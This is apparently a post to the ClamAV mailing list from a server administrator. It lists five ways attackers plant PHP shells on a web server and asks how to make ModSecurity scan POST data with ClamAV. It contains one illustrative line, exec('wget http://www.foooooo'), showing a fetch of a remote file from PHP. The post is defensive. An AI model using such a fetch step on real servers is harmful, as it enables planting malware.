Dear all , all you know about the new methods of attack like phpshell code ,
and the old methods like iframe attack
i did scan all upload files via pure-ftp , Cpanel Uploader , and PHP upload
.
But what if the attacker , open an php editor , put the virus code in the
editor , hit submit . the code will stored in the server , with no sound :)
I know that if i scan the server i will have a report about it , but the bad
news that the hacker will attack an do his job , then i will see "Oh there
is a hacking file here "
i think that we have 5 way to place a file on the server.
1- FTP
2- Upload via Cpanel
3- PHP Uploader
4- Write the vireos code to the file via "Cpanel / PHP editor "
5- get the virus file via HTTP request by PHP "file_get_content(),
exec('wget http://www.foooooo') ", or via CURL
the most common ways is 1 - 2 - 3 .
but i notes on my server that hacker kip getting smarter .
he start using method " 4 " and i am sure he will move to method 5
So what do you think about that ? i know that there is a program name : "
ModSecurity " and i can scan the post but how can i tell ModSecurity to
use clamAV that what i dont know . there is a method to scan the uploaded
file by ModSecurity , but that is not my goal , i need to scan the post
data , not the POST uploaded files
_______________________________________________
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml
